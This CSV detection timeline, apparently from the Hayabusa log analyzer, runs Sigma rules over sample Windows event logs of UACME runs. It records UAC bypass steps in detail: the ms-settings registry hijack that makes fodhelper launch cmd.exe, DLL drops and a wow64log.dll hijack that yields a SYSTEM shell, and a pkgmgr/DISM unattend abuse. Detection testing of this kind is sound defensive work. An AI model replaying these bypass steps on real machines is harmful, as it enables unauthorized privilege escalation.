2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,../hayabusa-rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
